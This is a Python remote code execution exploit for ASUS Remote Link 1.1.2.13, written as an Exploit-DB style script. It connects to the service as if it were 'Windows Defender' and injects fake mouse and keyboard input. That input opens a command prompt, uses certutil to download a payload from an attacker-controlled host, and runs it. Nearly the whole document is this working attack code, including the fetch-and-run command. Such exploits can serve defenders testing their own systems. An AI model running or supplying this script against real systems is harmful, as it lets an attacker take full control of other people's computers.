# Exploit: ASUS Remote Link 1.1.2.13 - Remote Code Execution # Date: 24-02-2021 # Exploit Author: H4rk3nz0 # Vendor Homepage: http://asus.com/ # Software Link: http://remotelink.asus.com/ # Version: 1.1.2.13 # Tested on: Windows 10 Enterprise Build 17763 # CVE: N/A #!/usr/bin/python import socket from time import sleep import sys port = 5665 target = socket.socket(socket.AF_INET, socket.SOCK_STREAM) prefix = "04020b02" suffix = "0000020000000000000000000300000000000000000004000000000000000000010000" enter = (prefix + ("0" * 1038)).decode("hex") string_prefix = "04020b0200000000010000" string_suffix = "0" * 1022 pre_command = "04000b0200000000".decode("hex") user_declare = ("02028a0000000000000057696e646f777320446566656e646572" + "0" * 224).decode("hex") # Declares Connection Source as 'Windows Defender' # ASCII to Hex Character List characters={ "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e", "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a", "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e", "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a", "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30", " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c", ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a", "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e", "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"} # User Specified arguments try: rhost = "192.168.1.93" lhost = sys.argv[2] payload = sys.argv[3] except: print("Usage: python " + sys.argv[0] + " ") exit() # HandShake Packets to Smart Gesture Server def Handshake(): target.connect((rhost,port)) target.sendto("b2".decode("hex"),(rhost,port)) target.sendto("38323538".decode("hex"),(rhost,port)) target.sendto("03000f0000000000".decode("hex"),(rhost,port)) target.sendto("03020f000000000003310000000000".decode("hex"),(rhost,port)) target.sendto("02008a0000000000".decode("hex"),(rhost,port)) target.sendto(user_declare,(rhost,port)) sleep(0.1) def MoveMouse(): for i in range(0,16): target.sendto("0000330038040006".decode("hex"),(rhost,port)) target.sendto(("00013300380400060101db010000c502" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101d0010000ca02" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101c7010000ce02" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101bd010000d202" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101b2010000d502" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101a6010000d802" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010199010000db02" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601018d010000de02" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010180010000e002" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010171010000e402" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010163010000e602" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010154010000e902" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010146010000eb02" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601013b010000ed02" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601012d010000f002" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010120010000f302" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010113010000f702" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010107010000fa02" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101fa000000fd02" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101f10000000003" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101e50000000303" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101d90000000603" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101ce0000000903" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101c20000000d03" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101b60000001103" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101ab0000001403" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101a00000001803" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101950000001c03" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101890000002003" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601017e0000002403" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101740000002703" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601016c0000002a03" + suffix).decode("hex"),(rhost,port)) target.sendto(("00013300380400060101650000002c03" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601015c0000002f03" + suffix).decode("hex"),(rhost,port)) target.sendto(("000133003804000601015c0000003003" + suffix).decode("hex"),(rhost,port)) target.sendto(("000233003804000601005c0000003003" + suffix).decode("hex"),(rhost,port)) sleep(0.6) # Sends Left Click Input (Occasional Delay for some Reason) def LeftClick(): target.sendto("0000330038040006".decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port)) target.sendto(("0002330038040006010016020000e502" + suffix).decode("hex"),(rhost,port)) sleep(4) # Send Enter/Return Key Input def SendReturn(): target.sendto(pre_command,(rhost,port)) sleep(0.2) target.sendto(enter,(rhost,port)) # Enter/Return Key # Send String Characters def SendString(string): for char in string: convert = characters[char] final_string = string_prefix + convert + string_suffix target.sendto(pre_command,(rhost,port)) target.sendto(final_string.decode("hex"),(rhost,port)) sleep(0.2) # Main Execution def main(): print("[+] Saying Hello") Handshake() sleep(2) print("[+] Moving Mouse") MoveMouse() print("[+] Left Clicking (takes a few seconds)") LeftClick() # Left Click is delayed sometimes print("[+] Opening CMD") SendString("cmd.exe") # Start Command Prompt sleep(0.5) SendReturn() sleep(1) print("[+] Retrieving Payload") SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\Temp\\" + payload) # Retrieve Payload sleep(0.5) SendReturn() sleep(3) print("[+] Executing") SendString("C:\\Windows\\Temp\\" + payload) # Execute Payload sleep(0.5) SendReturn() sleep(0.5) print("[+] Done! Check your listener?") SendReturn() # Trailing Enter Command Ensures full execution target.close() exit() if __name__=="__main__": main()